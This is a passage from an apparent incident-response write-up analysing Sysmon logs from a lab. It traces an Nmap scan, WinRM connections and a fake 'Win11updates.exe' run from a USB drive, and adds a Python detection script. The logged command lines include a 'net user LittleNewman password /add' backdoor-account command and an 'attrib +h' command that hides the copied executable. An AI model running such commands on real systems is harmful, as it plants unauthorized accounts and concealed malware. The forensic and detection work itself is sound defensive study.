<span style="color: white;"> ProcessId 6764 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span>Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span>
<span> User NEWMAN-PC\Newman </span></b></span>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">SourceHostname Newman-PC </span></b></span>
<span style="color: white;"> SourcePort 49705 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.4 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">DestinationHostname JERRY-PC </span></b></span><b><span style="color: #fcff01;">
<span> DestinationPort 5985 </span></span></b>
<span style="color: white;"> DestinationPortName - </span>
</pre></div>
</div><div><br /></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:08.321 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b3f8-64bd-a900-000000004200} </span>
<span style="color: white;"> ProcessId 6764 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span></b></span><b><span style="color: #fcff01;">
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">SourceHostname Newman-PC </span></b></span>
<span style="color: white;"> SourcePort 49706 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.4 </span>
<span style="color: #fcff01;"><span> <b>DestinationHostname JERRY-PC </b></span><b>
<span> DestinationPort 5985 </span></b></span>
<span style="color: white;"> DestinationPortName -</span>
</pre></div>
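</div><div><br /></div><div>The NEWMAN-PC events above lend themselves to two simple detections: one process fanning out to many host:port pairs in a short window (the Nmap scan, including the scanner hitting itself), and a known remoting client such as <i>powershell.exe</i> opening connections to WinRM. The script below is an added example, not code from the original post: it takes Sysmon process-creation and network-connection records as dictionaries, rebuilds the parent chain (explorer.exe to Zenmap's pythonw.exe to nmap.exe) and summarises each process's outbound connections. The records are constructed to mirror the page's events; the ProcessGuid values are shortened placeholders and the <i>powershell.exe</i> process-creation record, which the page does not show, is assumed with <i>explorer.exe</i> as its parent.</div><div><br /></div><div>

```python
"""Added example (not part of the original post): scan and lateral-movement triage
over Sysmon records, modelled on the NEWMAN-PC events in the post.

Assumptions: events are dicts keyed by Sysmon's EventData field names plus "id"
(Sysmon Event ID: 1 = process create, 3 = network connect).  EVENTS is constructed
to mirror the page's records; ProcessGuid values are shortened placeholders and the
powershell.exe process-create record (not shown on the page) is assumed.
"""
from datetime import datetime

PORT_LABELS = {135: "msrpc", 139: "netbios-ssn", 445: "smb", 1433: "ms-sql-s",
               3389: "rdp", 5985: "winrm-http", 5986: "winrm-https"}
WINRM_PORTS = {5985, 5986}
REMOTING_CLIENTS = {"powershell.exe", "pwsh.exe", "winrs.exe"}

NMAP = r"C:\Program Files (x86)\Nmap\nmap.exe"
ZENMAP = r"C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"


def proc(t, guid, pid, image, pguid, pimage):
    return {"id": 1, "UtcTime": t, "ProcessGuid": guid, "ProcessId": pid, "Image": image,
            "ParentProcessGuid": pguid, "ParentImage": pimage, "User": r"NEWMAN-PC\Newman"}


def conn(t, guid, image, dport, dip="10.240.240.4"):
    return {"id": 3, "UtcTime": t, "ProcessGuid": guid, "Image": image, "Initiated": True,
            "SourceIp": "10.240.240.5", "DestinationIp": dip, "DestinationPort": dport}


EVENTS = [  # constructed sample, mirroring the post's records
    proc("2023-07-23 23:09:57.946", "g-zen", 6540, ZENMAP, "g-exp", EXPLORER),
    proc("2023-07-23 23:10:05.705", "g-nmap", 6708, NMAP, "g-zen", ZENMAP),
    conn("2023-07-23 23:10:08.559", "g-nmap", NMAP, 135),
    conn("2023-07-23 23:10:08.559", "g-nmap", NMAP, 139),
    conn("2023-07-23 23:10:08.560", "g-nmap", NMAP, 445),
    conn("2023-07-23 23:10:08.560", "g-nmap", NMAP, 135, "10.240.240.6"),
    conn("2023-07-23 23:10:08.560", "g-nmap", NMAP, 139, "10.240.240.6"),
    conn("2023-07-23 23:10:08.561", "g-nmap", NMAP, 445, "10.240.240.6"),
    conn("2023-07-23 23:10:08.561", "g-nmap", NMAP, 1433, "10.240.240.6"),
    conn("2023-07-23 23:10:35.832", "g-nmap", NMAP, 445, "10.240.240.5"),   # Newman scanning himself
    proc("2023-07-23 23:13:00.000", "g-ps", 6764, PS, "g-exp", EXPLORER),   # assumed record
    conn("2023-07-23 23:13:07.856", "g-ps", PS, 5985),
    conn("2023-07-23 23:13:08.243", "g-ps", PS, 5985),
    conn("2023-07-23 23:13:08.321", "g-ps", PS, 5985),
]


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def process_chain(events, guid):
    """Follow ParentProcessGuid links, child first: 'nmap.exe <- pythonw.exe <- explorer.exe'."""
    by_guid = {e["ProcessGuid"]: e for e in events if e["id"] == 1}
    chain = []
    while guid in by_guid:
        ev = by_guid[guid]
        chain.append(basename(ev["Image"]))
        guid = ev["ParentProcessGuid"]
        if guid not in by_guid:            # parent started before the log window; use its name
            chain.append(basename(ev["ParentImage"]))
    return " <- ".join(chain)


def network_fanout(events, guid):
    """Summarise the outbound connections of one process, or None if it made none."""
    conns = [e for e in events if e["id"] == 3 and e["ProcessGuid"] == guid and e["Initiated"]]
    if not conns:
        return None
    times = sorted(ts(e["UtcTime"]) for e in conns)
    pairs = {(e["DestinationIp"], e["DestinationPort"]) for e in conns}
    hosts = {ip for ip, _ in pairs}
    ports = sorted({p for _, p in pairs})
    return {"connections": len(conns), "hosts": len(hosts), "pairs": len(pairs), "ports": ports,
            "window_s": (times[-1] - times[0]).total_seconds(),
            "self_scan": conns[0]["SourceIp"] in hosts,        # scanner did not --exclude itself
            "services": sorted(PORT_LABELS[p] for p in ports if p in PORT_LABELS)}


def triage(events, min_hosts=2, min_pairs=5, max_window_s=120):
    """Flag scan-like fan-out, and known remoting clients reaching WinRM (5985/5986)."""
    findings = []
    for ev in (e for e in events if e["id"] == 1):
        fan = network_fanout(events, ev["ProcessGuid"])
        if fan is None:
            continue
        image, chain = basename(ev["Image"]), process_chain(events, ev["ProcessGuid"])
        if fan["hosts"] >= min_hosts and fan["pairs"] >= min_pairs and fan["window_s"] <= max_window_s:
            findings.append({"type": "scan", "image": image, "chain": chain, **fan})
        if image in REMOTING_CLIENTS and WINRM_PORTS & set(fan["ports"]):
            findings.append({"type": "winrm-client", "image": image, "chain": chain, **fan})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f["type"], f["chain"], f["hosts"], "hosts", f["pairs"], "ip:port pairs", f["services"])
```

</div><div><br /></div><div>The thresholds (two or more hosts, five or more ip:port pairs inside two minutes) are deliberately low so that a fast scan of a small subnet is caught; on a busy server they would need tuning. The second rule does not try to decide whether the WinRM session was legitimate, it only ties the connection back to the process and user so that the Jerry-PC side can be checked, which is what the next section does.</div><div><br /></div><div>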
</div><div><br /></div><div><div>Transitioning to the logs for <i>Jerry-PC</i> at <i>10.240.240.4</i> to see exactly what was done by Newman on this system.</div><div><br /></div><div>I thought about starting the analysis from around the time Newman connected, which was at "<i>UtcTime 2023-07-23 23:13:07.856</i>" from source IP <i>10.240.240.5</i> on source port <i>49704 </i>to destination port <i>5985 </i>on Jerry's PC. However, poking around the logs prior to that time shows evidence of earlier problems. Let's look at some of these problems/concerns.</div><div><br /></div><div>Looks like Jerry might have also been the source of some of his own problems. A file named "<i>Win11updates.exe</i>" was executed from the drive lettered "<i>E</i>", with <i>explorer.exe</i> as the parent, i.e. it was launched interactively from the shell. This may be a network mapped drive, a USB disk or some other removable media.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:07.426 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38b-64bd-9900-000000003100} </span>
<span style="color: white;"> ProcessId 1600 </span>
<b><span style="color: #fcff01;"><span> Image E:\Win11updates.exe </span>
</span></b><span style="color: white;"> FileVersion - </span>
<span style="color: white;"> Description - </span>
<span style="color: white;"> Product - </span>
<span style="color: white;"> Company - </span>
<span style="color: white;"> OriginalFileName - </span>
<span style="color: #fcff01;"><b><span> CommandLine "E:\Win11updates.exe" </span>
<span> CurrentDirectory E:\ </span>
<span> User JERRY-PC\Jerry </span>
</b></span><span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-795a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a79 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">IntegrityLevel Medium </span></b></span>
<span style="color: white;"> Hashes MD5=25703C731DA76007CB83370106AA9A39,SHA256=35BB4785955B852476C63C06262F6C1079E1C850B6B2B9DE4EAC40349ED937AD,IMPHASH=0B5552DCCD9D0A834CEA55C0C8FC05BE </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b318-64bd-4500-000000003100} </span>
<span style="color: white;"> ParentProcessId 3440 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">ParentImage C:\Windows\explorer.exe </span></b></span><b><span style="color: #fcff01;">
<span> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span> ParentUser JERRY-PC\Jerry </span></span></b>
</pre></div>
</div><div><br /></div><div>No evidence of executables was found on the USB disk provided. So where did this "<i>Win11updates.exe</i>" file come from?! Did I miss something? </div><div><br /></div><div>Well, I did. While having a conversation with Jean, he told me the evidence was right there; I just missed it. This reinforces the need to pay close attention to what your logs say. Here is the actual entry I missed initially.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span><span style="color: white;"> RuleName </span><b><span style="color: #fcff01;">Context,DeviceConnectedOrUpdated </span></b></span>
<span style="color: white;"> EventType SetValue </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:01.707 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b385-64bd-8a00-000000003100} </span>
<span style="color: white;"> ProcessId 7464 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>Image C:\Windows\System32\WUDFHost.exe</b></span><span style="color: white;"> </span>
<span style="color: #fcff01;"><b><span> TargetObject HKLM\System\CurrentControlSet\Enum\SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_General&Prod_UDisk&Rev_5.00#6&1526ad36&0&_&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\FriendlyName </span>
</b></span><b><span style="color: #fcff01;"><span> Details E:\ </span>
</span></b><span style="color: white;"> User NT AUTHORITY\LOCAL SERVICE </span>
</pre></div>
</div><div><br /></div><div>As we can see above, a USB mass-storage device (<i>Ven_General</i>, <i>Prod_UDisk</i>, instance <i>6&1526ad36&0</i> in the <i>USBSTOR</i> path) was inserted and assigned drive letter E:. This correlates with where the "<i>Win11updates.exe</i>" file was loaded from. The value is written by <i>WUDFHost.exe</i>, the user-mode driver framework host that services portable devices, running as <i>LOCAL SERVICE</i>.</div><div><br /></div><div>Back to normal programming.</div><div><br /></div><div>Interestingly, I see the file was loaded a second time. Notice the process ID change. Paying close attention to the integrity level, we see this second run is with higher-level privileges, more like Administrator-level privileges. <i>IntegrityLevel High</i> is the elevated token granted through a UAC prompt; note that the <i>LogonId</i> also changes (0x55a79 to 0x55a23), because the elevated, unfiltered token of a split-token administrator session carries its own logon id.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:09.645 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9c00-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 6648 </span>
<span> Image E:\Win11updates.exe</span></b></span><span style="color: white;"> </span>
<span style="color: white;"> FileVersion - </span>
<span style="color: white;"> Description - </span>
<span style="color: white;"> Product - </span>
<span style="color: white;"> Company - </span>
<span style="color: white;"> OriginalFileName - </span>
<span style="color: white;"> CommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">IntegrityLevel High </span></b></span>
<span style="color: white;"> Hashes MD5=25703C731DA76007CB83370106AA9A39,SHA256=35BB4785955B852476C63C06262F6C1079E1C850B6B2B9DE4EAC40349ED937AD,IMPHASH=0B5552DCCD9D0A834CEA55C0C8FC05BE </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b318-64bd-4500-000000003100} </span>
<span style="color: white;"> ParentProcessId 3440 </span>
<span style="color: white;"> ParentImage C:\Windows\explorer.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We also see that information about this "<i>Win11Updates.exe</i>" file is written to the registry. Here we see one such example: the <i>InventoryApplicationFile</i> key under <i>\REGISTRY\A\</i> is the Amcache hive (<i>Amcache.hve</i>) loaded as an application hive, and <i>LinkDate</i> is the compile (PE link) timestamp of the binary, 07/20/2023, three days before the incident. Amcache persists after the executable is gone, so this entry would outlive the removal of the USB disk.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName InvDB-CompileTimeClaim </span>
<span style="color: #fcff01;"><b><span> EventType SetValue </span>
</b></span><span style="color: white;"> UtcTime 2023-07-23 23:11:09.730 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b311-64bd-1600-000000003100} </span>
<span style="color: white;"> ProcessId 1132 </span>
<span style="color: white;"> Image C:\Windows\System32\svchost.exe </span>
<b><span style="color: #fcff01;"><span> TargetObject \REGISTRY\A\{5dfb6902-580d-20f2-eee2-25aecfb2b037}\Root\InventoryApplicationFile\win11updates.exe|79834fe67b152d51\LinkDate </span>
<span> Details 07/20/2023 02:17:43 </span>
</span></b><span style="color: white;"> User NT AUTHORITY\SYSTEM </span>
</pre></div>
</div><div><br /></div><div><div>We also see the executable writes the Visual C++ Runtime (<i>VCRUNTIME140.dll</i>) into a temporary directory under the user's profile.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName DLL </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:09.770 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9c00-000000003100} </span>
<span style="color: white;"> ProcessId 6648 </span>
<span style="color: white;"> Image E:\Win11updates.exe </span>
<b><span style="color: #fcff01;"><span> TargetFilename C:\Users\Jerry\AppData\Local\Temp\_MEI66482\VCRUNTIME140.dll </span>
</span></b><span style="color: white;"> CreationUtcTime 2023-07-23 23:11:09.770 </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>The <i>Win11Updates.exe</i> file then spawns a copy of itself.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:09.936 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<b><span style="color: #fcff01;"><span> ProcessId 5512 </span>
</span></b><span><b><span style="color: #fcff01;"> Image E:\Win11updates.exe</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> FileVersion - </span>
<span style="color: white;"> Description - </span>
<span style="color: white;"> Product - </span>
<span style="color: white;"> Company - </span>
<span style="color: white;"> OriginalFileName - </span>
<span style="color: white;"> CommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=25703C731DA76007CB83370106AA9A39,SHA256=35BB4785955B852476C63C06262F6C1079E1C850B6B2B9DE4EAC40349ED937AD,IMPHASH=0B5552DCCD9D0A834CEA55C0C8FC05BE </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9c00-000000003100} </span>
<span style="color: white;"> ParentProcessId 6648 </span>
<span style="color: #fcff01;"><b><span> ParentImage E:\Win11updates.exe </span>
</b></span><span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>From the spawned "<i>Win11updates.exe</i>" we now see Powershell being launched, executing a command to create a new user named "<i>LittleNewman</i>" with password "<i>password</i>" on "<i>JERRY-PC</i>". This process runs under the current credentials of "<i>JERRY-PC\Jerry</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:10.510 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38e-64bd-9e00-000000003100} </span>
<b><span style="color: #fcff01;"><span> ProcessId 6236 </span>
</span></b><span><b><span style="color: #fcff01;"> Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows PowerShell </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName PowerShell.EXE </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span> CommandLine powershell -Command "Start-Process -FilePath \"cmd.exe\" -ArgumentList \"/c net user LittleNewman password /add\" -Verb RunAs" </span>
<span> CurrentDirectory E:\ </span></b></span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"> ParentImage E:\Win11updates.exe</span><span style="color: white;"> </span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>As expected, Powershell spawned <i>cmd.exe</i> to execute the command above.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.181 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a000-000000003100} </span>
<b><span style="color: #fcff01;"><span> ProcessId 7880 </span>
</span></b><span><b><span style="color: #fcff01;"> Image C:\Windows\System32\cmd.exe</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<span style="color: #fcff01;"><span> CommandLine "C:\Windows\system32\cmd.exe" /c net user LittleNewman password /add </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38e-64bd-9e00-000000003100} </span>
<span style="color: white;"> ParentProcessId 6236 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine powershell -Command "Start-Process -FilePath \"cmd.exe\" -ArgumentList \"/c net user LittleNewman password /add\" -Verb RunAs" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>It also looks like the <i>Win11Updates.exe</i> file is running from "<i>C:\Users\Public\Win11updates.exe</i>". Maybe the file made a copy of itself. Maybe it was intentionally placed there. I have provided no evidence to show how it got there. I do know it is there, and that is all that matters to me at this point.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName EXE </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.229 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ProcessId 5512 </span>
<span style="color: white;"> Image E:\Win11updates.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b> TargetFilename C:\Users\Public\Win11updates.exe </b></span>
<span style="color: white;"> CreationUtcTime 2023-07-23 23:11:11.229 </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We next see an attempt to hide the file via the <i>attrib</i> command. The file being hidden is "<i>C:/Users/Public/Win11updates.exe</i>".</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.251 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a200-000000003100} </span>
<span style="color: white;"> ProcessId 5832 </span>
<span style="color: white;"> Image C:\Windows\System32\cmd.exe </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "attrib +h C:/Users/Public/Win11updates.exe" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>ParentImage E:\Win11updates.exe </b></span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>I'm beginning to wonder, if I am concerned about Newman, why all these tasks so far are being done by Jerry's account. Also, all of this activity was done prior to Newman connecting to the system. Newman's first connection to port 5985 was at "UtcTime 2023-07-23 23:13:07.856". From the Sysmon logs, <i>Win11Updates.exe</i> did not seem to create any network connections to allow a remote user to access this system. Is Jerry just as much a cause for concern here as Newman? Hmmmm! Incident response is definitely not easy.</div><div><div><br /></div><div>Once again, the user is being created.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.331 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a400-000000003100} </span>
<span style="color: #fcff01;"> <b>ProcessId 4416 </b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\net.exe </span></span>
</b><span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net.exe </span>
<span style="color: #fcff01;"><span> CommandLine net user LittleNewman password /add </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=BB1AE49B6B7C53499E94613761A6AC56,SHA256=AFBE51517092256504F797F6A5ABC02515A09D603E8C046AE31D7D7855568E91,IMPHASH=D45C37A5C97135204AD6E116C34946C3 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a000-000000003100} </span>
<span style="color: white;"> ParentProcessId 7880 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<span style="color: #fcff01;"><span> ParentCommandLine "C:\Windows\system32\cmd.exe" /c net user LittleNewman password /add </span>
